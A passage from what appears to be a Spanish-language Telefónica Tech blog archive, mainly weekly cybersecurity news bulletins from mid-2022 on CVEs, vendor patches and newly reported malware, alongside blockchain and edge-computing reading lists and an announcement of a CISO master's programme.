embargo, la adición de mecanismos de persistencia y de evasión de detección indican que los operadores de la botnet podrían estar interesados en las ventas de acceso inicial a actores de ransomware. Más info: https://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery
5 de agosto de 2022
Los 5 posts sobre Blockchain que tienes que leer
Siguiendo con nuestra serie de posts sobre los contenidos más leídos por cada tecnología, esta semana hacemos parada en el Blockchain para conocer, juntos a nuestros expertos de Telefónica Tech, más y mejor sobre ello. ¡Allá vamos! Identidad digital, privacidad y blockchain, ¿puede estar todo en la misma ecuación? Si tú también te has hecho alguna vez esta pregunta, no esperes más para leer este post donde nuestra experta María Teresa Nieto Galán nos desvela el misterio. BLOCKCHAIN Identidad digital, privacidad y Blockchain: ¿puede estar todo en la misma ecuación? 8 de noviembre de 2022 Los NFT y su relación con el blockchain Seguro que has oído hablar más de una vez sobre los NFT, pero si todavía no te ha quedado muy claro, te contamos qué son y qué tienen que ver con el Blockchain. BLOCKCHAIN AI OF THINGS NFT y su relación con Blockchain 5 de mayo de 2022 Las 7 prioridades de una empresa a la hora de adoptar Blockchain Esta tecnología lleva un tiempo acaparando las miradas de todas las empresas. ¿Quieres saber por qué? Blockchain Las 7 prioridades de una empresa a la hora de adoptar Blockchain 24 de octubre de 2022 5 tendencias clave para la adopción masiva de Blockchain Sí, es toda una realidad que el Blockchain se ha convertido en lo una de las claves del mercado tecnológico y te contamos las mejores tendencias para su adopción. BLOCKCHAIN AI OF THINGS 5 tendencias clave para la adopción masiva de Blockchain 15 de febrero de 2022 Incentivos en redes blockchain empresariales: un nuevo enfoque Pero esta tecnología no cesa en su evolución, y los nuevos enfoques ya han llegado. ¿Quieres ser el primero en conocerlos? BLOCKCHAIN Incentivos en redes Blockchain empresariales: un nuevo enfoque 16 de enero de 2023
2 de agosto de 2022
Boletín semanal de ciberseguridad, 22-29 de julio
Nueva vulnerabilidad crítica en productos de SonicWall Investigadores de DBappSecurity HAT lab han descubierto una vulnerabilidad crítica que afecta a varios productos de SonicWall Analytics On-Prem y SonicWall Global Management System. Se trata de una vulnerabilidad de inyección de código SQL, que ha sido catalogada como CVE-2022-22280 con CVSS 9.4, lo que permitiría acceder a información sensible, saltarse la autenticación o borrar información de la base de datos. Este fallo ha sido clasificado como crítico debido a que su aprovechamiento no requiere autenticación, interacción del usuario y la complejidad de ataque es baja. Por el momento, no se ha identificado explotación activa de este fallo ni se han reportado exploits conocidos. Esta vulnerabilidad afecta a las versiones de Analytics On-Prem 2.5.0.3-2520 y anteriores [1] y, en cuanto a SonicWall Global Management System, las versiones 9.3.1-SP2-Hotfix1 y anteriores [2]. Por último, el fabricante ha instado a todas aquellas organizaciones que usen sus productos a actualizar cuanto antes al nuevo parche de seguridad disponible. [1] https://www.sonicwall.com/support/knowledge-base/security-notice-sonicwall-analytics-on-prem-sql-injection-vulnerability/220613083254037/ [2] https://www.sonicwall.com/support/knowledge-base/security-notice-sonicwall-gms-sql-injection-vulnerability/220613083124303/ Más información: https://www.intezer.com/blog/research/lightning-framework-new-linux-threat/ Análisis de nuevo rootkit denominado CosmicStrand Investigadores de SecureList han descubierto un sofisticado rootkit de firmware UEFI para Windows denominado CosmicStrand. Este tipo de malware resulta especialmente evasivo y persistente, ya que pese a reiniciar el sistema operativo, el software malicioso permanecerá en el dispositivo. Respecto a la cadena de infección, CosmicStrand afecta a nivel de kernel el dispositivo infectado, apuntando contra las imágenes de firmware de las placas base Gigabyte o ASUS. Las imágenes de firmware serían modificadas en el controlador CSMCORE DXE para ejecutar una cadena de código durante el inicio de sistema que descarga el payload alojado en Windows. Según los investigadores, las modificaciones en las imágenes del firmware se podrían haber realizado aprovechando una vulnerabilidad. Lo que implicaría que los atacantes podrían haber tenido acceso previo al ordenador de la víctima para extraer, modificar y sobrescribir el firmware de la placa base. Entre los países afectados por esta actividad se encuentran China, Vietnam o Irán, además, cabe mencionar que las víctimas serían usuarios de versiones gratuitas de estos productos. Más información: https://securelist.com/cosmicstrand-uefi-firmware-rootkit/106973/ Vulnerabilidad 0-day en PrestaShop aprovechada contra tiendas e-commerce Se ha detectado la explotación de una vulnerabilidad 0-day en PrestaShop, la plataforma de e-commerce de código abierto más popular en Europa y Latinoamérica, utilizada por alrededor de 300.000 clientes en todo el mundo. Desde PrestaShop indican que los atacantes estarían aprovechando una combinación de vulnerabilidades para inyectar código malicioso en los sitios web que emplean su software, lo que les permite ejecutar código arbitrario con el objetivo de robar información de pago de clientes de los e-commerce. Entre los fallos explotados, el equipo de PrestaShop detectó un 0-day de inyección SQL (CVE-2022-36408 [1]) que se habría corregido en la versión 1.7.8.7, si bien indican que puede haber más métodos para llevar a cabo este ataque. Además, desde PrestaShop han publicado una serie de comprobaciones para verificar la afectación, así como recomendaciones para mantener el sitio e-commerce seguro como mantener el software actualizado y deshabilitar la función MySQL Smarty Cache, empleada por los atacantes para realizar los ataques. [1] NVD - CVE-2022-36408 (nist.gov) Más información: https://build.prestashop.com/news/major-security-vulnerability-on-prestashop-websites/
29 de julio de 2022
Los posts que tienes que leer, sí o sí, sobre Edge Computing
Sabemos que estos días de vacaciones se pasan volando, pero también que siempre encuentras algún que otro rato para poder disfrutar de alguna lectura interesante. Por ello, nos hemos puesto manos a la obra para traerte un recopilatorio de los mejores temas de Edge Computing de este año. ¿A qué esperas para disfrutarlos? Edge Computing, la vida en la frontera De la mano de nuestro experto de Telefónica Tech en Edge Computing, Emilio Moreno, en este post podrás repasar los conceptos clave de esta tecnología. CLOUD Edge Computing: la vida en la frontera 17 de febrero de 2022 Latencia y Edge Computing: ¿Por qué es importante? Junto a la tecnología Edge Computing aparece siempre, y de manera muy ligada, un término sobre el que el que aquí indagamos de manera más profunda: la latencia. CLOUD Latencia y Edge Computing: ¿Por qué es importante? 20 de septiembre de 2022 Edge Computing y Machine Learning, una alianza estratégica Esta tecnología tiene más amigos por descubrir y dentro de la Inteligencia Artificial se ha cruzado con uno con el que hace muy buenas amigas: Machine Learning. ¡Te contamos por qué! CLOUD AI OF THINGS Edge Computing y Machine Learning, una alianza estratégica 7 de julio de 2022 ¿Cúales son los sectores que más apuestan por el Edge Computing? Y, por último, una vez hemos conocido más a fondo esta tecnología, reflexionamos sobre en qué sectores tiene más cabida el Edge y cómo y en qué medida se está apostando por ello.
27 de julio de 2022
Boletín semanal de ciberseguridad, 16 — 22 de julio
Lightning Framework: nuevo malware dirigido a entornos Linux El equipo de investigadores de Intezer ha publicado información relativa a un nuevo tipo de malware que afecta a entornos Linux y que han denominado Lightning Framework. Si bien los investigadores no han localizado una muestra completa y algunos detalles del malware aún se desconocen, se han podido analizar algunas de sus características. Se trata de un malware avanzado que se instala en el sistema de la víctima a través de un downloader que descargará todos sus módulos y plugins. A partir de ahí, el malware se hace pasar por el gestor de contraseñas GNOME para conectar con un servidor Command & Control polimórfico y descargar más componentes. Otras de sus características son la manipulación de marcas de tiempo e IDs de procesos, la creación de un script con el nombre "elastisearch" para crear persistencia y la implantación de una puerta trasera mediante la creación de su propio servidor SSH. Tal y como apunta el medio Bleeping Computer, Lightning Framework es el último de una creciente ola de variantes de malware que atacan sistemas Linux, tras la detecciones recientes de otros casos como OrBit, Symbiote, BPFDoor o Syslogk. Más info → * * * Cisco corrige múltiples vulnerabilidades Cisco ha lanzado parches de seguridad para corregir 45 vulnerabilidades (tres críticas, una categorizada como alta y 41 de gravedad media) que afectaban a diversos productos. De los fallos corregidos destacan tres, catalogados como CVE-2022-20857 CVSS 9,8, CVE-2022-20858 CVSS 8,9 y CVE-2022-20861 CVSS 9,8, que afectaban a la solución de gestión de centros de datos Cisco Nexus Dashboard y que podrían permitir a un atacante remoto no autentificado ejecutar comandos arbitrarios y realizar acciones con privilegios de root o de administrador. Asimismo, también destaca otro fallo de gravedad alta, catalogado como CVE-2022-20860 CVSS 7.4, en la implementación SSL/TLS de Cisco Nexus Dashboard que podría permitir a un atacante remoto no autenticado alterar las comunicaciones interceptando el tráfico en ataques man-in-the-middle. Si bien no se tiene constancia de que estos fallos se estén explotando activamente, desde Cisco instan a los usuarios de los dispositivos afectados que apliquen los parches lo antes posible. Más info → * * * Luna: Nuevo ransomware dirigido a Windows, Linux y ESXi Investigadores de seguridad de Kaspersky han descubierto en un foro de ransomware de la dark web una nueva familia de ransomware basada en el lenguaje de programación Rust, denominada como Luna. Este nuevo ransomware parece tener capacidades para cifrar dispositivos que utilicen varios sistemas operativos, incluyendo Windows, Linux y sistemas ESXi. Según los expertos de Kaspersky, actualmente Luna parece ser un ransomware simple en fase de desarrollo y, por el momento, limitado únicamente a opciones de línea de comandos. No obstante, su esquema de cifrado es poco habitual, al combinar el intercambio seguro de claves X25519 de curva elíptica Diffie-Hellman, utilizando Curve25519 con el algoritmo de cifrado simétrico Advanced Encryption Standard (AES). Asimismo, la tendencia del uso de un lenguaje multiplataforma como Rust, denota la corriente utilizada por las bandas de ciberdelincuentes que desarrollan ransomware capaz de dirigirse a múltiples sistemas operativos, sin realizar grandes esfuerzos y adaptaciones para cada objetivo. Según indica la investigación, no se conocen datos sobre posibles víctimas de esta familia de ransomware, ya que sus operadores acaban de ser descubiertos y su actividad aún está siendo monitorizada. Más info → * * * Atlassian corrige fallo crítico en credenciales codificadas de Confluence Atlassian ha lanzado una actualización de seguridad en la que ha corregido una vulnerabilidad crítica de credenciales codificadas en Confluence Server y Data Center que podría permitir a atacantes remotos no autenticados iniciar sesión en servidores vulnerables. En concreto, la contraseña codificada se añade tras la instalación de la aplicación Questions for Confluence (versiones 2.7.34, 2.7.35 y 3.0.2) para una cuenta con el nombre de usuario disabledsystemuser, diseñada para ayudar a los administradores con la migración de datos de la aplicación a la nube de Confluence. La cuenta disabledsystemuser se crea con una contraseña codificada y se añade al grupo confluence-users, que permite ver y editar todas las páginas no restringidas dentro de Confluence por defecto. Por tanto, la explotación de esta vulnerabilidad, clasificada como CVE-2022-26138, permitiría a un atacante iniciar sesión y acceder a cualquier página a la que el grupo confluence-users tenga acceso. Por el momento no se ha observado la explotación activa de este fallo y, desde Atlassian, afirman que esta aplicación, que ayuda a mejorar las comunicaciones internas, estaría instalada en más de 8.000 servidores de Confluence. Para parchear este error se recomienda actualizar a las versiones corregidas (2.7.38 o superiores a 3.0.5), o deshabilitar o eliminar la cuenta disabledsystemuser, ya que desinstalar la aplicación Questions for Confluence no sería suficiente. Más info → * * * CloudMensis: Nuevo malware dirigido a macOS Un grupo de investigadores de ESET ha descubierto un nuevo malware que estaría siendo utilizado para implementar puertas traseras y exfiltrar información en dispositivos macOS. Este software malicioso fue detectado inicialmente en abril del 2022 por el equipo de ESET y ha sido denominado como CloudMensis. Una de sus características a destacar es el uso de servicios de almacenamiento en la nube como DropBox, Yandex Disk o pCloud para la comunicación con sus servidores de comando y control (C2). Asimismo, CloudMensis consigue ejecutar código en el sistema objetivo y obtener privilegios de administrador para ejecutar una segunda fase más funcional que recopila información, como archivos adjuntos en correos electrónicos, capturas de pantalla, exfiltración de documentos, pulsaciones de teclado y otros datos sensibles. De igual manera, por el momento se desconoce cómo se distribuye y cuál es el vector de infección, así como también quiénes serían los objetivos finales de este malware y el actor amenaza al que atribuir esta actividad. Más info →
22 de julio de 2022
España necesita 83.000 profesionales en ciberseguridad en los próximos dos años
Nos encontramos ante un escenario único a nivel global, donde el papel del CISO (Chief Information Security Officer) o Responsable de Seguridad de la Información, es clave para garantizar la resiliencia de empresas, organizaciones y administraciones públicas. Según el último balance de ciberseguridad publicado por Instituto Nacional de Ciberseguridad (INCIBE) y su centro de Respuesta a Incidentes de Seguridad (CERT) en 2020 se gestionaron un total de 133.155 incidentes. Por ello, la formación de profesionales en ciberseguridad parece crucial. Sin embargo, en España existe una brecha entre la oferta y la demanda de este tipo de profesionales. En este sentido, según el ‘Análisis y Diagnóstico del Talento en Ciberseguridad en España’ elaborado por el Observatorio Nacional de Tecnología y Sociedad (ONTSI) y el Instituto Nacional de Ciberseguridad (INCIBE), en 2021 en el ámbito de la ciberseguridad, existía una brecha de más de 24.000 empleos. En 2024, se calcula que la demanda de empleo seguirá creciendo hasta superar los 83.000 profesionales. EL CISO (Chief Information Security Officer) es la persona responsable de la seguridad de la información de una empresa Por este motivo, Universidad Loyola y Telefónica Tech se han unido para impulsar la formación de los responsables de ciberseguridad. Ambas organizaciones han puesto en marcha el nuevo Máster en Ciberseguridad para CISO que se impartirá a partir de octubre, en el Campus de Sevilla de la institución universitaria jesuita. Esta figura profesional está cobrando una especial relevancia en la estrategia de las organizaciones de forma paralela al proceso de digitalización de la economía y la sociedad, cuestión que ha puesto el foco en todas las cuestiones relativas a la ciberseguridad. Formación 100% práctica adaptada a las necesidades en ciberseguridad del mercado empresarial El Máster en Ciberseguridad para CISO Loyola-Telefónica Tech está diseñado para preparar a los estudiantes para afrontar con solvencia los aspectos fundamentales que el CISO debe manejar en su actividad: Conocimiento del marco jurídico y de negocio Protección de la información Detección de amenazas y respuesta ante ellas Incorporación de la investigación y la innovación en la resolución de problemas. “Nos encontramos ante un escenario único a nivel global, donde el papel del CISO o Responsable de Seguridad de la Información, es clave para garantizar la continuidad de los negocios y las administraciones”, dice Antonio Gil, director general de Softcom y director del máster. “La formación en ciberseguridad es fundamental para que las empresas afronten con garantías su transformación digital” Luis Pablo del Árbol, responsable de desarrollo de negocio en Telefónica Tech Cybersecurity & Cloud Los estudiantes contarán con una formación innovadora y a la vanguardia de las últimas novedades en materia de ciberseguridad, gracias al claustro de profesores compuesto por expertos de Telefónica Tech, así como de otros profesionales nacionales e internacionales invitados a diferentes masterclasses. Asimismo, el programa cuenta con un enfoque eminentemente práctico, por lo que, junto al contenido académico, se desarrollarán sesiones específicas de “security cases” en las que, tutorizado por expertos, el alumnado tendrá la oportunidad de diseñar proyectos de protección y ciberseguridad en organizaciones a partir de casos reales. Campus de la Universidad Loyola, en Sevilla. Foto: Universidad Loyola Marta Pérez, directora de Loyola Másteres, escuela de postgrado de la Universidad Loyola, ha señalado que “se trata de una apuesta que actualiza y conecta la formación de postgrado con las necesidades actuales de las empresas en una cuestión, como la ciberseguridad, en la que la demanda de profesionales es actualmente muy alta y seguirá creciendo en los próximos años”. Junto al plan de estudios diseñado con los expertos de Telefónica Tech, el Máster en Ciberseguridad para CISO cuenta con un programa de actividades extraacadémicas que completarán la formación de los estudiantes y potenciarán su empleabilidad, incluyendo visitas a empresas y participación en congresos y encuentros profesionales, entre otras.
21 de julio de 2022
Boletín semanal de ciberseguridad, 9 — 15 de julio
Rozena: backdoor distribuido mediante la explotación de la vulnerabilidad Follina El equipo de investigadores de Fortinet ha publicado el análisis de una campaña maliciosa en la que han detectado la distribución de una nueva puerta trasera aprovechando la conocida vulnerabilidad denominada Follina (CVE-2022-30190). En concreto, este nuevo software malicioso ha recibido el nombre de Rozena y su función principal es inyectar un shell inverso al host del atacante, permitiendo a actores maliciosos tomar el control del sistema de la víctima, así como posibilitar la monitorización y captura de información, y/o mantener una puerta trasera al sistema comprometido. Con relación a la metodología empleada para realizar la infección, esta consiste en distribuir documentos de office maliciosos, que cuando se ejecutan, estos se conectan a una URL de Discord que recupera un archivo HTML que, a su vez, invoca la herramienta vulnerable de diagnóstico de soporte de Microsoft Windows (MSDT), dando como resultado la descarga del payload, en el que está incluido Rozena. Más info → * * * Microsoft corrige un 0-day activamente explotado Microsoft ha publicado recientemente su boletín de seguridad correspondiente al mes de julio donde corrige un total de 84 vulnerabilidades, entre ellas un 0-day activamente explotado. Del total de fallos detectados, 5 se corresponderían con vulnerabilidades de denegación de servicio, 11 de divulgación de información, 4 de omisión de funciones de seguridad, 52 de elevación de privilegios, y 12 de ejecución remota de código. Dentro de este último tipo es donde se encuentran las cuatro vulnerabilidades clasificadas como críticas (CVE-2022-30221, CVE-2022-22029, CVE-2022-22039, CVE-2022-22038), siendo el resto de las vulnerabilidades de gravedad alta. Cabe destacar el 0-day, catalogado como CVE-2022-22047 con un CVSSv3 7.8, descubierto por Microsoft Threat Intelligence Center (MSTIC) y Microsoft Security Response Center (MSRC), implica una vulnerabilidad de elevación de privilegios CSRSS de Windows, lo que podría permitir a un atacante obtener privilegios de SYSTEM. De acuerdo con Microsoft se habría detectado la explotación activa de este fallo si bien por el momento no se han aportado más detalles al respecto, por lo que se recomienda aplicar los parches lo antes posible. Asimismo, la CISA ha añadido esta vulnerabilidad a su catálogo de vulnerabilidades activamente explotadas. Más info → * * * Vulnerabilidad en la autenticación de un componente de AWS Kubernetes La investigadora de seguridad Gafnit Amiga ha descubierto la existencia de varios fallos de seguridad en el proceso de autenticación de IAM Authenticator de AWS, un componente para Kubernetes utilizado por Amazon Elastic Kubernetes Service (EKS). El fallo radica en una incorrecta validación de parámetros de consulta dentro del plugin del autenticador cuando se configura el uso del parámetro “AccessKeyID” de la plantilla dentro de las cadenas de consulta. Su explotación, podría permitir a un atacante evadir la protección existente contra ataques de repetición u obtener los permisos más elevados en el clúster haciéndose pasar por otras identidades; es decir, escalar privilegios dentro del clúster de Kubernetes. Según la investigadora, dos de los fallos identificados existen desde el primer lanzamiento de 2017, mientras que el tercero, que es el que permite la suplantación de identidades, es explotable desde septiembre de 2020. A los fallos en su conjunto se les ha identificado como CVE-2022-2385 y han recibido una criticidad alta. Por su parte AWS ha confirmado que desde el pasado 28 de junio todos los clústers de EKS han sido actualizados con una nueva versión de IAM Authenticator donde se soluciona el problema. Los clientes que gestionan sus propios clústers y que utilizan el parámetro "AccessKeyID" del complemento del autenticador deben actualizar a la versión 0.5.0 de AWS IAM Authenticator for Kubernetes. Más info → * * * VMware corrige vulnerabilidad en vCenter Server Recientemente VMware ha publicado una nueva versión de vCenter Server 7.0 3f en la que corrige, ocho meses después, una vulnerabilidad en el mecanismo de autenticación integrada con Windows descubierta por Crowdstrike y con CVE-2021-22048. Este fallo solo puede ser explotado desde la misma red física o lógica en la que esté el servidor afectado, y aunque se trata de un ataque complejo, requiere pocos privilegios y no necesita interacción del usuario. No obstante, desde el NIST se apunta a que podría ser explotado de forma remota. Las versiones de vCenter Server afectadas por la vulnerabilidad son la 6.5, 6.7 y 7.0. Para aquellos que no puedan actualizar a la versión más reciente ya parcheada, la compañía ha proporcionado unas medidas de mitigación que pasan por cambiar a un modelo de autenticación de Directorio Activo sobre LDAP. La CVE-2021-22048 también afecta a las versiones 3 y 4 de WMware Cloud Foundation, sin que hayan sido corregidas por el momento. Mas info → * * * Campaña de phishing a través de Anubis Network El medio portugués Segurança Informatica ha publicado detalles sobre una nueva oleada de la persistente campaña de phishing, que hace uso del portal Anubis Network para configurar sus ataques y que llevaría activa desde marzo de 2022. Los usuarios afectados, principalmente de Portugal y Brasil, reciben mensajes smishing o phishing de servicios financieros donde los usuarios se ven obligados a indicar su número de teléfono y su número PIN, para en segunda instancia ser redirigidos a páginas bancarias donde se solicitan sus credenciales de acceso. De acuerdo con los investigadores, el servidor Command & Control, alojado en Anubis Network, está controlado por cerca de 80 operadores. Asimismo, el análisis muestra como Anubis ofrece facilidades para hacer tracking de los datos de los usuarios, de los dominios falsos creados para suplantar a los bancos y de las direcciones de email temporales que los operadores pueden configurar para cada caso. More info →
15 de julio de 2022
Boletín semanal de ciberseguridad, 25 de junio — 1 de julio
Kaspersky investiga ataques a sistemas de control industrial Investigadores de Kaspersky han investigado una campaña de ataques que se centraba en diversos países del continente asiático, y que estaba dirigida contra sistemas de control industrial (ICS) de empresas de telecomunicaciones y del sector industrial. De acuerdo con los investigadores, la mayoría de los incidentes analizados, tuvieron como vector de entrada la explotación de la vulnerabilidad catalogada como CVE-2021-26855, que afecta a los servidores de Microsoft Exchange y que permite la ejecución de código remoto. El inicio de esta campaña se remonta a octubre de 2021 y, desde entonces, se ha valido de la puerta trasera conocida como ShadowPad, que se camuflaba como un DLL legítimo para poder ser ejecutado en el equipo infectado. Una vez infectado el sistema, los actores amenaza inyectan en remoto balizas de Cobalt Strike y consiguen hacerse con el control de los sistemas de automatización de un edificio, incluida la electricidad, control de incendios o seguridad, entre otros. Una vez tiene el control de estos sistemas, se redistribuye por la red interna a través de una cuenta cuyas credenciales han robado, consiguiendo así acceder a más servicios internos y de mayor interés como información confidencial. Por el momento, los objetivos finales de los atacantes siguen siendo desconocidos, aunque se cree que puedan estar recopilando información. Más información → * * * Descubierta una puerta trasera dirigida a gobiernos y organizaciones de todo el mundo Investigadores de seguridad de Kaspersky han revelado que agentes amenaza habrían estado utilizando un malware, al que han denominado SessionManager, descubierto en servidores de Microsoft Exchange pertenecientes a organizaciones gubernamentales y militares de Europa, Oriente Medio, Asia y África. SessionManager es un módulo malicioso de código nativo para el servidor IIS (Internet Information Services) de Microsoft y que los investigadores descubrieron mientras continuaban buscando puertas traseras IIS similares a Owowa, otro módulo IIS malicioso desplegado por los atacantes en los servidores Microsoft Exchange Outlook Web Access desde finales de 2020 para robar credenciales de Exchange. El backdoor SessionManager permite a los actores amenaza mantener un acceso persistente, resistente a las actualizaciones y bastante sigiloso a la infraestructura de TI de una organización objetivo y obtener acceso a los correos electrónicos de la empresa, actualizar el acceso malicioso instalando otros tipos de malware o administrar clandestinamente servidores comprometidos, que pueden aprovecharse como infraestructura maliciosa. Debido a la similitud de las víctimas y al uso de una variante común de OwlProxy, los investigadores creen que el módulo IIS malicioso puede haber sido aprovechado por el actor amenaza Gelsemium, como parte de una operación de espionaje mundial. Más información → * * * Zero-day en dispositivos Mitel utilizado para ataque de ransomware Investigadores de CrowdStrike han analizado un incidente en el que actores maliciosos habrían utilizado un exploit que aprovecha una vulnerabilidad zero-day, que afecta a dispositivos de VoIP Mitel MiVoice, para distribuir ransomware. En concreto, el fallo de seguridad, ahora identificado CVE-2022-29499 y con un CVSSv3 de 9.8, se debe a un error en la validación de datos cuando se realiza un script de diagnóstico, lo que permite a atacantes remotos no autenticados inyectar comandos mediante solicitudes especialmente diseñadas. Asimismo, cabe indicar que la vulnerabilidad se encuentra en el componente Mitel Service Appliance de MiVoice Connect, utilizado en SA 100, SA 400 y Virtual SA, lo que posibilita a un atacante realizar la ejecución remota de código. Aunque no se ha publicado ningún parche oficial, Mitel lo abordó el 19 de abril de 2022, difundiendo un script de corrección para las versiones 19.2 SP3 de MiVoice Connect y R14.x y anteriores. Debido a este incidente, los investigadores estiman que es probable que se produzcan más distribuciones de ransomware utilizando este vector de entrada, por ello recomiendan que se apliquen las correcciones. Más información → * * * Más de 900.000 instancias de Kubernetes están expuestas en internet Investigadores de Cyble han realizado un análisis para localizar instancias de Kubernetes expuestas en internet, empleando herramientas de escaneo y consultas de búsquedas similares a las utilizadas por los operadores maliciosos. De este análisis, se han detectado más de 900.000 servidores de Kubernetes expuestos, aunque no necesariamente todas estas instancias expuestas sean vulnerables a ataques o expongan datos sensibles. De los servidores, los puertos TCP con mayor exposición son el “443” con un poco más de un millón de instancias, seguidos del puerto “10250” y del “6443” respectivamente. Según Cyble, la gran mayoría de las instancias expuestas devuelven el código error 403, indicando que la solicitud no autenticada está prohibida y no pueden producirse ataques contra estas. No obstante, han detectado un pequeño subconjunto de 799 instancias que devuelven un código de estado 200, que es completamente accesible a los atacantes externos. Aunque, el número de servidores vulnerables es bastante bajo, solo es necesario que se descubra una vulnerabilidad explotable de forma remota para que un número mucho mayor de dispositivos sean vulnerables a estos ataques. Más información → * * * FabricScape: vulnerabilidad en Microsoft Service Fabric Investigadores de Unit 42 de Palo Alto han informado del descubrimiento de una vulnerabilidad en Microsoft Azure Service Fabric que afectaría a contenedores en el cluster de Linux. El fallo, CVE-2022-30137 CVSSv3 7.6, fue descubierto y comunicado a la compañía a principios de 2022, y afecta a esta herramienta, ampliamente utilizada para alojar más de un millón de aplicaciones, algunas de ellas de suma importancia. La vulnerabilidad ha sido denominada FabricScape y se debe a un fallo de escritura arbitraria por condición de carrera en el componente Data Collection Agent (DCA), ejecutado como root en Service Fabric. Esto permitiría a un atacante elevar sus privilegios a root, hacerse con el control del nodo host y comprometer todo el cluster de Linux de Service Fabric. La vulnerabilidad quedó resuelta con el parche de junio para Microsoft Azure Service Fabric 9.0 para todos aquellos usuarios que tengan activas las actualizaciones automáticas. En caso de no tener esta función activa, se recomienda actualizar manualmente a la versión de Service Fabric más reciente. Más información →
2 de julio de 2022
Boletín semanal de ciberseguridad, 18 — 24 de junio
Caída de los servicios de Microsoft Office 365 y Cloudflare a nivel mundial A lo largo del pasado martes se vieron interrumpidos múltiples servicios web a nivel mundial. El origen de estos incidentes residía, por un lado, en Microsoft Office 365 y por otro, en Cloudflare. En la madrugada de ayer martes, múltiples usuarios manifestaron problemas de acceso a servicios de Microsoft Office 365, entre ellos Exchange, Teams o SharePoint; desde Microsoft informaron en su cuenta oficial de Twitter acerca de estos problemas, así como de que estos radicarían en que la infraestructura de gestión del tráfico no estaría funcionando. Por otro lado, Cloudflare también sufrió una interrupción masiva en el día de ayer, afectando a sitios webs conocidos como Amazon, Telegram, Twitch, o Gitlab, entre otros. El origen de este incidente fue causado por un cambio en la configuración de la red enmarcado dentro de un proyecto interno para aumentar la resiliencia de sus ubicaciones más concurridas, dando lugar a que 19 de sus centros de datos se vieran afectados. Actualmente ambos incidentes se encuentran solventados y todos los servicios funcionan con normalidad. Más información → Vulnerabilidad crítica afecta a dispositivos NAS de QNAP QNAP ha publicado un aviso de seguridad sobre una vulnerabilidad que afecta a sus dispositivos NAS (Network Attached Storage). Según indica el fabricante, algunos de sus modelos de servidores serían vulnerables a posibles ataques a través de una vulnerabilidad crítica de PHP que se remonta tres años atrás, siempre y cuando su configuración no sea por defecto. La vulnerabilidad, que fue identificada como CVE-2019-11043 y con un CVSS3 de 9.8, permite la ejecución de código remoto para las versiones de PHP 7.1.x inferiores a 7.1.33, 7.2.x inferiores a 7.2.24 y 7.3.x inferiores a 7.3.11. La empresa indica que, para poder explotar esta vulnerabilidad, se requiere que tanto Nginx como PHP-FPM estén instalados en el servidor NAS. En el caso de que se cumplan estas condiciones, dicho fallo afectará a las siguientes versiones de sus sistemas operativos: QTS 5.0.X y posteriores, QTS 4.5.X y posteriores, y las posteriores a las versiones siguientes QuTS hero h5.0.x, QuTS hero h4.5.X, QuTSCloud c5.0.x. Asimismo, QNAP indica a sus clientes que, por el momento, hay parches para los sistemas operativos QTS 5.0.1.2034 build 20220515 y posteriores y QuTS hero h5.0.0.2069 build 20220614 y posteriores. Más información → Quantum: nueva herramienta para la creación de archivos LNK maliciosos Los investigadores de Cyble han identificado una nueva herramienta basada en la creación de archivos .LNK maliciosos que estaría siendo cada vez más utilizada en las fases iniciales de un ataque. El uso de archivos .LNK con código malicioso no es algo nuevo, ya que se viene utilizando para manipular herramientas legítimas de sistemas Windows en infecciones con malware como Emotet, Bumblebee, Qbot y IcedID. Con esta nueva herramienta, denominada Quantum, los atacantes pueden realizar con facilidad técnicas como la evasión del control de cuentas de usuario o del componente SmartScreen, la carga de varios payloads mediante un único .LNK, la construcción de archivos HTA e ISO o la ejecución de malware de forma retardada, entre otras. Asimismo, los desarrolladores de esta herramienta destacan que los archivos generados son evadidos por las correspondientes soluciones de seguridad. En último lugar, cabe destacar que algunas versiones de Quantum incluyen también exploits para la vulnerabilidad "dogwalk", y desde Cyble estarían vinculando su uso a la conocida APT Lazarus. Más información → Cisco anuncia que no corregirá una vulnerabilidad en routers Small Business RV Desde Cisco han advertido a los usuarios que aún utilizan routers Small Business RV que la empresa no tiene planeado corregir una nueva vulnerabilidad de ejecución remota de código, a la que se ha asignado un CVSS de 9.8. La vulnerabilidad, catalogada como CVE-2022-20825, es fruto de una validación insuficiente de paquetes HTTP en los routers Small Business: 110W Wireless-N VPN Firewall, RV130 VPN, RV130W Wireless-N Multifunction VPN, y RV215W Wireless-N VPN, siempre y cuando la interface web de gestión remota esté habilitada en conexiones WAN. De acuerdo con la compañía, pese a la gravedad del fallo, no se está preparando ningún parche o corrección de la vulnerabilidad, ya que estos dispositivos están actualmente fuera de soporte, y ha dejado claro que la única mitigación posible es desactivar la interfaz de gestión remota. Por lo tanto, la compañía ha recomendado a sus usuarios que migren su operación a routers Cisco Small Business RV132W, RV160 y RV160W. Más información → Vulnerabilidad crítica en TheHive y Cortex La empresa de seguridad StrangeBee ha publicado un aviso de seguridad para informar sobre una vulnerabilidad crítica de omisión de autenticación descubierta en TheHive y Cortex. TheHive es una plataforma de respuesta a incidentes de seguridad de código abierto, ampliamente utilizada por empresas de todo el mundo, mientras que Cortex es un motor de análisis independiente, desarrollado también por StrangeBee. La vulnerabilidad, que fue descubierta por Przemysław Mazurek, permite suplantar cualquier cuenta en la plataforma, incluidas las cuentas de administrador, siempre y cuando el módulo de autenticación de Active Directory (AD) esté habilitado y se utilice para autenticar a los usuarios en estas plataformas. Esto se debe a que AD acepta conexiones anónimas, dando lugar a que, si alguien envía una solicitud de autenticación para una cuenta existente sin contraseñas mediante la API de TheHive/Cortex, la respuesta de AD a la solicitud permite autenticarse como “anónimo”. Esta vulnerabilidad, que aún no dispone de identificador, afecta a las versiones de TheHive 3 a 5 y Cortex 3, por lo que se recomienda actualizar lo antes posible a la última versión. Más información →
24 de junio de 2022
Los ataques más comunes contra las contraseñas y cómo protegerte
